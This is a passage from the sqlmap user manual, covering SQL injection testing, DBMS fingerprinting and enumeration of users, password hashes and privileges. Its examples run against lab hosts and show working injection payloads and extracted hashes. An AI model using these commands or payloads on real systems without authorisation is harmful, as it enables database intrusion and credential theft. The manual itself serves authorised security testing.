Another way to get around the dynamicity issue above explained is to exclude the dynamic part from the page content before processing it.

As you see in the above example the number after Dynamic content: was dynamic and changed each second. To get around of this problem we could use the above explained page comparison options or exclude this snippet of dynamic text from the page before processing it and comparing it with the not injected page.

```
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int_refresh.php?id=1" \
--excl-reg "Dynamic content: ([\d]+)"

[hh:mm:22] [INFO] testing connection to the target url
[hh:mm:22] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
[hh:mm:22] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
[hh:mm:22] [INFO] testing if GET parameter 'id' is dynamic
[hh:mm:22] [INFO] confirming that GET parameter 'id' is dynamic
[hh:mm:22] [INFO] GET parameter 'id' is dynamic
[hh:mm:22] [INFO] testing sql injection on GET parameter 'id'
[hh:mm:22] [INFO] testing numeric/unescaped injection on GET parameter 'id'
[hh:mm:22] [INFO] confirming numeric/unescaped injection on GET parameter 'id'
[hh:mm:22] [INFO] GET parameter 'id' is numeric/unescaped injectable
[hh:mm:22] [INFO] testing for parenthesis on injectable parameter
[hh:mm:22] [INFO] the injectable parameter requires 0 parenthesis
[...]
```

As you can see, when this options is specified, sqlmap skips the URL stability test.

5.5 Techniques

5.5.1 Test for stacked queries (multiple statements) support

```
Option: -stacked-test
```

It is possible to test if the web application technology supports **stacked queries**, multiple statements, on the injectable parameter.

Example on a MySQL 5.0.67 target:

```
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" \
    --stacked-test -v 1

[...]
back-end DBMS: MySQL >= 5.0.0

[hh:mm:15] [INFO] testing stacked queries support on parameter 'id'
[hh:mm:15] [WARNING] the web application does not support stacked queries on parameter 'id'
stacked queries support: None
```

By default PHP builtin function mysql_query() does not support multiple statements. Multiple statements is a feature supported by default only by some web application technologies in relation to the back-end database management system. For instance, as you can see from the next example, where PHP does not support them on MySQL, it does on PostgreSQL.

Example on a PostgreSQL 8.3.5 target:

```
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" \
    --stacked-test -v 1

[...]
back-end DBMS: PostgreSQL

[hh:mm:01] [INFO] testing stacked queries support on parameter 'id'
[hh:mm:06] [INFO] the web application supports stacked queries on parameter 'id'
stacked queries support: 'id=1; SELECT pg_sleep(5);-- AND 3128=3128'
```

Example on a Microsoft SQL Server 2005 Service Pack 0 target:

```
$ python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" \
    --stacked-test -v 1

[...]
back-end DBMS: Microsoft SQL Server 2005

[hh:mm:09] [INFO] testing stacked queries support on parameter 'name'
[hh:mm:23] [INFO] the web application supports stacked queries on parameter 'name'
stacked queries support: 'name=luther'; WAITFOR DELAY '0:0:5';-- AND 'wRcBC'='wRcBC'
```

5.5.2 Test for time based blind SQL injection

Options: -time-test and -time-sec

It is possible to test if the target URL is affected by a time based blind SQL injection vulnerability.

Example on a MySQL 5.0.67 target:

```
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" \
    --time-test -v 1

[...]
back-end DBMS: MySQL >= 5.0.0

[hh:mm:05] [INFO] testing time based blind sql injection on parameter 'id' with AND condition syntax
[hh:mm:10] [INFO] the parameter 'id' is affected by a time based blind sql injection with AND condition syntax
time based blind sql injection payload: 'id=1 AND SLEEP(5) AND 5249=5249'
```

Example on a PostgreSQL 8.3.5 target:

```
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" \
    --time-test -v 1

[...]
back-end DBMS: PostgreSQL

[hh:mm:30] [INFO] testing time based blind sql injection on parameter 'id' with AND condition syntax
```

```
[hh:mm:30] [WARNING] the parameter 'id' is not affected by a time based blind sql injection with AND condition syntax
[hh:mm:30] [INFO] testing time based blind sql injection on parameter 'id' with stacked query syntax
[hh:mm:35] [INFO] the parameter 'id' is affected by a time based blind sql injection with stacked query syntax
time based blind sql injection payload: 'id=1; SELECT pg_sleep(5);-- AND 9644=9644'
```

Example on a Microsoft SQL Server 2005 Service Pack 0 target:

```
$ python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" \
    --time-test -v 1

[...]
back-end DBMS: Microsoft SQL Server 2005

[hh:mm:59] [INFO] testing time based blind sql injection on parameter 'name' with AND condition syntax
[hh:mm:59] [WARNING] the parameter 'name' is not affected by a time based blind sql injection with AND condition syntax
[hh:mm:59] [INFO] testing time based blind sql injection on parameter 'name' with stacked query syntax
[hh:mm:13] [INFO] the parameter 'name' is affected by a time based blind sql injection with stacked query syntax
time based blind sql injection payload: 'name=luther'; WAITFOR DELAY '0:0:5';-- AND 'PmrXn'='PmrXn'
```

It is also possible to set the seconds to delay the response by providing the -time-sec option followed by an integer. By default it delays five seconds.

5.5.3 Test for UNION query SQL injection

Options: -union-test and -union-tech

It is possible to test if the target URL is affected by a **UNION query (inband) SQL injection** vulnerability. Refer to the *Techniques* section for details on this SQL injection technique.

Example on an Oracle XE 10.2.0.1 target:

```
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1" \
    --union-test -v 1

[...]
back-end DBMS: Oracle

[hh:mm:27] [INFO] testing inband sql injection on parameter 'id' with NULL bruteforcing technique
[hh:mm:27] [INFO] the target url could be affected by an inband sql injection vulnerability valid union: 'http://192.168.1.121:80/sqlmap/oracle/get_int.php?id=1 UNION ALL SELECT
NULL, NULL, NULL FROM DUAL-- AND 6558=6558'
```

By default sqlmap uses the NULL **bruteforcing** technique to detect the number of columns within the original SELECT statement. It is also possible to change it to ORDER BY **clause bruteforcing** with the **-union-tech** option.

Further details on these techniques can be found here.

Example on a PostgreSQL 8.3.5 target:

```
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_str.php?id=1" \
    --union-test --union-tech orderby -v 1

[...]
back-end DBMS: PostgreSQL

[hh:mm:51] [INFO] testing inband sql injection on parameter 'id' with ORDER BY clause
bruteforcing technique
[hh:mm:51] [INFO] the target url could be affected by an inband sql injection vulnerability
valid union: 'http://192.168.1.150:80/sqlmap/pgsql/get_int.php?id=1 ORDER BY 3-- AND
1262=1262'
```

As you can see, the target URL parameter id might be also exploitable by the inband SQL injection technique. In case a case it is strongly recommended to use this technique which saves a lot of time.

It is strongly recommended to run at least once sqlmap with the -union-test option to test if the affected parameter is used within a for cycle, or similar, and in case use -union-use option to exploit this vulnerability because it saves a lot of time and it does not weight down the web server log file with hundreds of HTTP requests.

5.5.4 Use the UNION query SQL injection

Option: -union-use

Providing the -union-use parameter, sqlmap will first test if the target URL is affected by an **inband SQL injection** (-union-test) vulnerability then, in case it seems to be vulnerable, it will confirm that the parameter is affected by a **Full UNION query SQL injection** and use this technique to go ahead with the exploiting. If the confirmation fails, it will check if the parameter is affected by a **Partial UNION query SQL injection**, then use it to go ahead if it is vulnerable. In case the inband SQL injection vulnerability is not exploitable, sqlmap will automatically fallback on the blind SQL injection technique to go ahead.

Example on a Microsoft SQL Server 2000 Service Pack 0 target:

```
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" -v 1 \
  --union-use --banner
[...]
back-end DBMS: Microsoft SQL Server 2000
[hh:mm:42] [INFO] fetching banner
[hh:mm:42] [INFO] testing inband sql injection on parameter 'id' with NULL bruteforcing
technique
[hh:mm:42] [INFO] the target url could be affected by an inband sql injection vulnerability
[hh:mm:42] [INFO] confirming full inband sql injection on parameter 'id'
[hh:mm:42] [INFO] the target url is affected by an exploitable full inband sql injection
vulnerability
[hh:mm:42] [INFO] query: UNION ALL SELECT NULL, (CHAR(110)+CHAR(83)+CHAR(68)+CHAR(80)+
CHAR(84)+CHAR(70))+ISNULL(CAST(@@VERSION AS VARCHAR(8000)), (CHAR(32)))+(CHAR(70)+CHAR(82)+
CHAR (100) + CHAR (106) + CHAR (72) + CHAR (75)), NULL -- AND 5204=5204
[hh:mm:42] [INFO] performed 3 queries in 0 seconds
banner:
```

```
Microsoft SQL Server 2000 - 8.00.194 (Intel X86)

Aug 6 2000 00:57:48

Copyright (c) 1988-2000 Microsoft Corporation

Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
```

As you can see, the vulnerable parameter (id) is affected by both blind SQL injection and exploitable full inband SQL injection vulnerabilities.

Example on a MySQL 5.0.67 target:

```
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" -v 5 \
 --union-use --current-user
[hh:mm:29] [INFO] the target url is affected by an exploitable full inband sql
injection vulnerability
[hh:mm:29] [INFO] query: UNION ALL SELECT NULL, CONCAT(CHAR(112,110,121,77,88,86),
IFNULL (CAST (CURRENT_USER() AS CHAR (10000)), CHAR (32)), CHAR (72,89,75,77,121,103)),
NULL# AND 8032=8032
[hh:mm:29] [TRAFFIC OUT] HTTP request:
GET /sqlmap/mysql/get_int.php?id=1%20UNION%20ALL%20SELECT%20NULL%2C%20C0NCAT%28CHAR%28112
%2C110%2C121%2C77%2C88%2C86%29%2C1FNULL%28CAST%28CURRENT_USER%28%29%2OAS%2OCHAR%2810000%29
%29%2C%20CHAR%2832%29%29%2CCHAR%2872%2C89%2C75%2C77%2C121%2C103%29%29%2C%2ONULL%23%20AND
%208032=8032 HTTP/1.1
Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Host: 192.168.1.121:80
Accept-language: en-us, en; q=0.5
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
image/png,*/*;q=0.5
User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)
Connection: close
[hh:mm:29] [TRAFFIC IN] HTTP response (OK - 200):
Date: Tue, 16 Dec 2008 hh:mm:29 GMT
Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4 with Suhosin-Patch mod_ssl/2.2.9
OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-2ubuntu4
Content-Length: 194
Connection: close
Content-Type: text/html
<html><body>
<b>SQL results:</b>
</body></html>
[hh:mm:29] [INFO] performed 3 queries in 0 seconds
current user:
               'testuser@localhost'
```

As you can see, the MySQL CURRENT_USER() function (-current-user) output is nested, inband, within the HTTP response page, this makes the inband SQL injection exploited.

In case the inband SQL injection is not fully exploitable, sqlmap will check if it is partially exploitable: this occurs if the query output is not parsed within a for, or similar, cycle but only the first entry is displayed in the page content.

Example on a MySQL 5.0.67 target:

```
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int_partialunion.php?id=1" -v 1 \setminus
  --union-use --dbs
back-end DBMS: MySQL >= 5.0.0
[hh:mm:56] [INFO] fetching database names
[hh:mm:56] [INFO] testing inband sql injection on parameter 'id' with NULL bruteforcing
[hh:mm:56] [INFO] the target url could be affected by an inband sql injection vulnerability
[hh:mm:56] [INFO] confirming full inband sql injection on parameter 'id'
[hh:mm:56] [WARNING] the target url is not affected by an exploitable full inband sql
injection vulnerability
[hh:mm:56] [INFO] confirming partial inband sql injection on parameter 'id'
[hh:mm:56] [INFO] the target url is affected by an exploitable partial inband sql injection
vulnerability
[hh:mm:56] [INFO] query: UNION ALL SELECT NULL, CONCAT(CHAR(90,121,78,99,122,76),
IFNULL(CAST(COUNT(schema_name) AS CHAR(10000)), CHAR(32)), CHAR(110,97,105,116,84,120)), NULL
FROM information_schema.SCHEMATA# AND 1062=1062
[hh:mm:56] [INFO] performed 6 queries in 0 seconds
[hh:mm:56] [INFO] the SQL query provided returns 4 entries
[hh:mm:56] [INFO] query: UNION ALL SELECT NULL, CONCAT(CHAR(90,121,78,99,122,76),IFNULL(
CAST(schema_name AS CHAR(10000)), CHAR(32)),CHAR(110,97,105,116,84,120)), NULL FROM
information_schema.SCHEMATA LIMIT 0, 1# AND 1421=1421
[hh:mm:56] [INFO] performed 7 queries in 0 seconds
[hh:mm:56] [INFO] query: UNION ALL SELECT NULL, CONCAT(CHAR(90,121,78,99,122,76),IFNULL(
CAST(schema_name AS CHAR(10000)), CHAR(32)),CHAR(110,97,105,116,84,120)), NULL FROM
information_schema.SCHEMATA LIMIT 1, 1# AND 9553=9553
[hh:mm:56] [INFO] performed 8 queries in 0 seconds
[hh:mm:56] [INFO] query: UNION ALL SELECT NULL, CONCAT(CHAR(90,121,78,99,122,76),IFNULL(
CAST(schema_name AS CHAR(10000)), CHAR(32)), CHAR(110,97,105,116,84,120)), NULL FROM
information_schema.SCHEMATA LIMIT 2, 1# AND 6805=6805
[hh:mm:56] [INFO] performed 9 queries in 0 seconds
[hh:mm:56] [INFO] query: UNION ALL SELECT NULL, CONCAT(CHAR(90,121,78,99,122,76),IFNULL(
CAST(schema_name AS CHAR(10000)), CHAR(32)), CHAR(110,97,105,116,84,120)), NULL FROM
information_schema.SCHEMATA LIMIT 3, 1# AND 739=739
[hh:mm:56] [INFO] performed 10 queries in 0 seconds
available databases [4]:
[*] information_schema
[*] mysql
[*] privatedb
[*] test
```

As you can see, sqlmap identified that the parameter is affected by a partial inband SQL injection, consequently counted the number of query output entries and retrieved once per time by forcing the parameter (id) value 1 to its negative value -1 so that it does not returns, presumibly, any output leaving our own UNION ALL SELECT statement to produce one entry at a time and display it in the page content.

5.6 Fingerprint

5.6.1 Extensive database management system fingerprint

```
Options: -f or -fingerprint
```

By default the web application's back-end database management system fingerprint is performed requesting a database specific function which returns a known static value. By comparing these value with the returned value it is possible to identify if the back-end database is effectively the one that sqlmap expected. Depending on the DBMS being tested, a SQL dialect syntax which is syntatically correct depending upon the back-end DBMS is also tested.

After identifying an injectable vector, sqlmap fingerprints the back-end database management system and go ahead with the injection with its specific syntax within the limits of the database architecture.

Example on a MySQL 5.0.67 target:

```
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" -v 1
[...]
[hh:mm:17] [INFO] testing MySQL
[hh:mm:17] [INFO] confirming MySQL
[hh:mm:17] [INFO] query: SELECT 5 FROM information_schema.TABLES LIMIT 0, 1
[hh:mm:17] [INFO] retrieved: 5
[hh:mm:17] [INFO] performed 13 queries in 0 seconds
[hh:mm:17] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL >= 5.0.0
```

As you can see, sqlmap automatically fingerprints the web server operating system and the web application technology by parsing some HTTP response headers.

If you want to perform an extensive database management system fingerprint based on various techniques like specific SQL dialects and inband error messages, you can provide the -fingerprint option.

Example on a MySQL 5.0.67 target:

```
python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" -v 1 -f $
[...]
[hh:mm:49] [INFO] testing MySQL
[hh:mm:49] [INFO] confirming MySQL
[hh:mm:49] [INFO] query: SELECT 3 FROM information_schema.TABLES LIMIT 0, 1
[hh:mm:49] [INFO] retrieved: 3
[hh:mm:49] [INFO] performed 13 queries in O seconds
[hh:mm:49] [INFO] the back-end DBMS is MySQL
[hh:mm:49] [INFO] query: SELECT 3 FROM information_schema.PARAMETERS LIMIT 0, 1
[hh:mm:49] [INFO] retrieved:
[hh:mm:49] [INFO] performed 6 queries in 0 seconds
[hh:mm:49] [INFO] query: MID(@@table_open_cache, 1, 1)
[hh:mm:49] [INFO] retrieved:
[hh:mm:49] [INFO] performed 6 queries in 0 seconds
[hh:mm:49] [INFO] query: MID(@chostname, 1, 1)
[hh:mm:49] [INFO] retrieved: t
[hh:mm:49] [INFO] performed 13 queries in 0 seconds
```

Example on an Oracle XE 10.2.0.1 target:

Example on a PostgreSQL 8.3.5 target:

```
python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" -v 1 -f $
[\ldots]
[hh:mm:14] [WARNING] the back-end DMBS is not Oracle
[hh:mm:14] [INFO] testing PostgreSQL
[hh:mm:14] [INFO] confirming PostgreSQL
[hh:mm:14] [INFO] the back-end DBMS is PostgreSQL
[hh:mm:14] [INFO] query: SUBSTR(TRANSACTION_TIMESTAMP()::text, 1, 1)
[hh:mm:14] [INFO] retrieved: 2
[hh:mm:14] [INFO] performed 13 queries in 0 seconds
[hh:mm:14] [INFO] query: SUBSTR(TRANSACTION_TIMESTAMP(), 1, 1)
[hh:mm:14] [INFO] retrieved:
[hh:mm:14] [INFO] performed 6 queries in 0 seconds
web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: active fingerprint: PostgreSQL >= 8.3.0
               html error message fingerprint: PostgreSQL
```

As you can see from this last example, sqlmap first tested for MySQL, then for Oracle, then for PostgreSQL since the user did not forced the back-end database management system name with option -dbms.

Example on a Microsoft SQL Server 2000 Service Pack 0 target:

```
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" -v 1 -f
[...]
[hh:mm:41] [WARNING] the back-end DMBS is not PostgreSQL
[hh:mm:41] [INFO] testing Microsoft SQL Server
```

Example on a Microsoft SQL Server 2005 Service Pack 0 target:

```
$ python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" -v 1 -f

[...]

[hh:mm:41] [WARNING] the back-end DMBS is not PostgreSQL

[hh:mm:41] [INFO] testing Microsoft SQL Server

[hh:mm:41] [INFO] confirming Microsoft SQL Server

[hh:mm:41] [INFO] the back-end DBMS is Microsoft SQL Server

web server operating system: Windows 2003 or 2000

web application technology: ASP.NET, Microsoft IIS 6.0, ASP

back-end DBMS: active fingerprint: Microsoft SQL Server 2005

html error message fingerprint: Microsoft SQL Server
```

If you want an even more accurate result, based also on banner parsing, you can also provide the -b or -banner option.

Example on a MySQL 5.0.67 target:

```
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" -v 1 -f -b
[...]
[hh:mm:04] [INFO] testing MySQL
[hh:mm:04] [INFO] confirming MySQL
[hh:mm:04] [INFO] query: SELECT O FROM information_schema.TABLES LIMIT 0, 1
[hh:mm:04] [INFO] retrieved: 0
[hh:mm:04] [INFO] performed 13 queries in 0 seconds
[hh:mm:04] [INFO] the back-end DBMS is MySQL
[hh:mm:04] [INFO] query: VERSION()
[hh:mm:04] [INFO] retrieved: 5.0.67-Oubuntu6
[hh:mm:05] [INFO] performed 111 queries in 1 seconds
[hh:mm:05] [INFO] query: SELECT O FROM information_schema.PARAMETERS LIMIT 0, 1
[hh:mm:05] [INFO] retrieved:
[hh:mm:05] [INFO] performed 6 queries in 0 seconds
[hh:mm:05] [INFO] query: MID(@@table_open_cache, 1, 1)
[hh:mm:05] [INFO] retrieved:
[hh:mm:05] [INFO] performed 6 queries in 0 seconds
[hh:mm:05] [INFO] query: MID(@Ghostname, 1, 1)
[hh:mm:05] [INFO] retrieved: t
[hh:mm:06] [INFO] performed 13 queries in 0 seconds
[hh:mm:06] [INFO] executing MySQL comment injection fingerprint
web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
back-end DBMS: active fingerprint: MySQL >= 5.0.38 and < 5.1.2
               comment injection fingerprint: MySQL 5.0.67
               banner parsing fingerprint: MySQL 5.0.67
               html error message fingerprint: MySQL
[\ldots]
```

As you can see, sqlmap was able to fingerprint also the back-end DBMS operating system by parsing the DBMS banner value.

Example on a Microsoft SQL Server 2000 Service Pack 0 target:

```
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" -v 1 -f -b
     [...]
     [hh:mm:03] [WARNING] the back-end DMBS is not PostgreSQL
     [hh:mm:03] [INFO] testing Microsoft SQL Server
     [hh:mm:03] [INFO] confirming Microsoft SQL Server
     [hh:mm:03] [INFO] the back-end DBMS is Microsoft SQL Server
     [hh:mm:03] [INFO] performed 13 queries in 0 seconds
     [hh:mm:03] [INFO] query: @@VERSION
     [hh:mm:03] [INFO] retrieved: Microsoft SQL Server 2000 - 8.00.194 (Intel X86)
             Aug 6 2000 00:57:48
             Copyright (c) 1988-2000 Microsoft Corporation
             Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
     [hh:mm:08] [INFO] performed 1308 queries in 4 seconds
     web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
     web application technology: PHP 5.2.6, Apache 2.2.9
     back-end DBMS operating system: Windows 2000 Service Pack 4
     back-end DBMS: active fingerprint: Microsoft SQL Server 2000
                     banner parsing fingerprint: Microsoft SQL Server 2000 Service Pack 0
                     version 8.00.194
                     html error message fingerprint: Microsoft SQL Server
     [\ldots]
Example on a Microsoft SQL Server 2005 Service Pack 0 target:
     python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" -v 1 -f -b
     [hh:mm:03] [WARNING] the back-end DMBS is not PostgreSQL
     [hh:mm:03] [INFO] testing Microsoft SQL Server
     [hh:mm:03] [INFO] confirming Microsoft SQL Server
     [hh:mm:03] [INFO] the back-end DBMS is Microsoft SQL Server
     [hh:mm:03] [INFO] query: @@VERSION
     [hh:mm:03] [INFO] retrieved: Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86)
             Oct 14 2005 00:33:37
             Copyright (c) 1988-2005 Microsoft Corporation
             Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 1)
     [hh:mm:15] [INFO] performed 1343 queries in 11 seconds
     web server operating system: Windows 2003 or 2000
     web application technology: ASP.NET, Microsoft IIS 6.0, ASP
     back-end DBMS operating system: Windows 2003 Service Pack 1
     back-end DBMS: active fingerprint: Microsoft SQL Server 2005
                    banner parsing fingerprint: Microsoft SQL Server 2005 Service Pack 0
                    version 9.00.1399
                    html error message fingerprint: Microsoft SQL Server
```

As you can see, from the Microsoft SQL Server banner, sqlmap was able to correctly identify the database management system patch level. The Microsoft SQL Server XML versions file is the result of a sqlmap

parsing library that fetches data from Chip Andrews' SQLSecurity.com site and outputs it to the XML versions file.

5.7 Enumeration

5.7.1 Banner

```
Option: -b or -banner
```

Most of the modern database management systems have a function or an environment variable which returns details on the database managemet system version. Sometimes also the operating system where the daemon has been compiled on, the operating system architecture, its service pack. Usually this function is version() or the @@version environment variable.

Example on a MySQL 5.0.67 target:

```
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" -b -v 0
banner: '5.0.67-Oubuntu6'
Example on a PostgreSQL 8.3.5 target:
```

```
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" -b -v 0
banner: 'PostgreSQL 8.3.5 on i486-pc-linux-gnu, compiled by GCC gcc-4.3.real
(Ubuntu 4.3.2-1ubuntu11) 4.3.2'
```

Example on an Oracle XE 10.2.0.1 target:

```
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1" -b -v 0
banner: 'Oracle Database 10g Express Edition Release 10.2.0.1.0 - Product'
```

Example on a Microsoft SQL Server 2000 Service Pack 0 target:

Example on a Microsoft SQL Server 2005 Service Pack 0 target:

5.7.2 Current user

Option: -current-user

It is possible to retrieve the database management system's user which is effectively performing the query on the database from the web application.

Example on a MySQL 5.0.67 target:

```
python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --current-user -v 0
current user: 'testuser@localhost'
```

5.7.3 Current database

Option: -current-db

It is possible to retrieve the database management system's database the web application is connected to.

Example on a Microsoft SQL Server 2000 Service Pack 0 target:

```
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" --current-db -v 0
current database: 'master'
```

5.7.4 Detect if the DBMS current user is a database administrator

Option: -is-dba

It is possible to detect if the database management system session user is a database administrator.

Example on a **PostgreSQL 8.3.5** target:

```
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --is-dba -v 1
[...]
back-end DBMS: PostgreSQL

[hh:mm:49] [INFO] testing if current user is DBA
[hh:mm:49] [INFO] query: SELECT (CASE WHEN ((SELECT usesuper=true FROM pg_user WHERE usename=CURRENT_USER OFFSET 0 LIMIT 1)) THEN 1 ELSE 0 END)
[hh:mm:49] [INFO] retrieved: 1
[hh:mm:50] [INFO] performed 13 queries in 0 seconds
current user is DBA: 'True'
```

Example on an Oracle XE 10.2.0.1 target:

```
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1" --is-dba -v 1
[...]
back-end DBMS: Oracle
[16:40:57] [INFO] testing if current user is DBA
[16:40:58] [INFO] query: SELECT (CASE WHEN ((SELECT GRANTED_ROLE FROM DBA_ROLE_PRIVS WHERE
GRANTEE=SYS.LOGIN_USER AND GRANTED_ROLE=CHR(68)||CHR(66)||CHR(65))=CHR(68)||CHR(66)||CHR(65))
THEN 1 ELSE 0 END) FROM DUAL
```

```
[16:40:58] [INFO] retrieved: 1
[16:40:58] [INFO] performed 13 queries in 0 seconds
current user is DBA: 'True'
```

5.7.5 Users

Option: -users

It is possible to enumerate the list of database management system users.

Example on a PostgreSQL 8.3.5 target:

```
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --users -v 0
database management system users [3]:
[*] postgres
[*] testuser
[*] testuser2
```

5.7.6 Users password hashes

Options: -passwords and -U

It is possible to enumerate the password hashes for each database management system user.

Example on a MySQL 5.0.67 target:

```
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --passwords -v 0

[*] debian-sys-maint [1]:
    password hash: *BBDC22D2B1E18F8628B2922864A621B32A1B1892

[*] root [1]:
    password hash: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B

[*] testuser [1]:
    password hash: *00E247AC5F9AF26AE0194B41E1E769DEE1429A29
```

You can also provide the -U option to specify the user who you want to enumerate the password hashes.

Example on a Microsoft SQL Server 2000 Service Pack 0 target:

```
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" --passwords \
    -U sa -v 0

database management system users password hashes:
[*] sa [1]:
    password hash: 0x01000e16d704aa252b7c38d1aeae18756e98172f4b34104d8ee32c2f01b293b03edb7491fba9930b62ee5d506955
    header: 0x0100
    salt: 0e16d704
    mixedcase: aa252b7c38d1aeae18756e98172f4b34104d8ee3
    uppercase: 2c2f01b293b03edb7491fba9930b62ee5d506955
```

As you can see, when you enumerate password hashes on Microsoft SQL Server sqlmap split the hash, useful if you want to crack it.

If you provide CU as username it will consider it as an alias for current user and will retrieve the password hashes for this user.

Example on a PostgreSQL 8.3.5 target:

```
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --passwords \
  -U CU -v 1
[...]
back-end DBMS: PostgreSQL
[hh:mm:48] [INFO] fetching current user
[hh:mm:48] [INFO] query: COALESCE(CAST(CURRENT_USER AS CHARACTER(10000)), CHR(32))
[hh:mm:48] [INFO] retrieved: postgres
[hh:mm:49] [INFO] performed 62 queries in 0 seconds
[hh:mm:49] [INFO] fetching database users password hashes for current user
[hh:mm:49] [INFO] fetching number of password hashes for user 'postgres'
[hh:mm:49] [INFO] query: SELECT COALESCE(CAST(COUNT(DISTINCT(passwd)) AS CHARACTER(10000)),
CHR(32)) FROM pg_shadow WHERE usename=CHR(112)||CHR(111)||CHR(115)||CHR(116)||CHR(103)||
CHR (114) | | CHR (101) | | CHR (115)
[hh:mm:49] [INFO] retrieved: 1
[hh:mm:49] [INFO] performed 13 queries in 0 seconds
[hh:mm:49] [INFO] fetching password hashes for user 'postgres'
[hh:mm:49] [INFO] query: SELECT DISTINCT(COALESCE(CAST(passwd AS CHARACTER(10000)),
CHR(32))) FROM pg_shadow WHERE usename=CHR(112)||CHR(111)||CHR(115)||CHR(116)||CHR(103)||
CHR(114)||CHR(101)||CHR(115) OFFSET O LIMIT 1
[hh:mm:49] [INFO] retrieved: md5d7d880f96044b72d0bba108ace96d1e4
[hh:mm:51] [INFO] performed 251 queries in 2 seconds
database management system users password hashes:
[*] postgres [1]:
    password hash: md5d7d880f96044b72d0bba108ace96d1e4
```

5.7.7 Users privileges

Options: -privileges and -U

It is possible to enumerate the privileges for each database management system user.

Example on an Oracle XE 10.2.0.1 target:

```
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1" --privileges -v 0
[hh:mm:25] [WARNING] unable to retrieve the number of privileges for user 'ANONYMOUS'
[hh:mm:28] [WARNING] unable to retrieve the number of privileges for user 'DIP'
database management system users privileges:
[*] CTXSYS [2]:
    privilege: CTXAPP
    privilege: RESOURCE
[*] DBSNMP [1]:
    privilege: OEM_MONITOR
[*] FLOWS_020100 (administrator) [4]:
    privilege: CONNECT
    privilege: DBA
    privilege: RESOURCE
    privilege: SELECT_CATALOG_ROLE
[*] FLOWS_FILES [2]:
```

```
privilege: CONNECT
         privilege: RESOURCE
     [*] HR (administrator) [3]:
         privilege: CONNECT
         privilege: DBA
         privilege: RESOURCE
     [*] MDSYS [2]:
         privilege: CONNECT
         privilege: RESOURCE
     [*] OUTLN [1]:
         privilege: RESOURCE
     [*] SYS (administrator) [22]:
         privilege: AQ_ADMINISTRATOR_ROLE
         privilege: AQ_USER_ROLE
         privilege: AUTHENTICATEDUSER
         privilege: CONNECT
         privilege: CTXAPP
         privilege: DBA
         privilege: DELETE_CATALOG_ROLE
         privilege: EXECUTE_CATALOG_ROLE
         privilege: EXP_FULL_DATABASE
         privilege: GATHER_SYSTEM_STATISTICS
         privilege: HS_ADMIN_ROLE
         privilege: IMP_FULL_DATABASE
         privilege: LOGSTDBY_ADMINISTRATOR
         privilege: OEM_ADVISOR
         privilege: OEM_MONITOR
         privilege: PLUSTRACE
         privilege: RECOVERY_CATALOG_OWNER
         privilege: RESOURCE
         privilege: SCHEDULER_ADMIN
         privilege: SELECT_CATALOG_ROLE
         privilege: XDBADMIN
         privilege: XDBWEBSERVICES
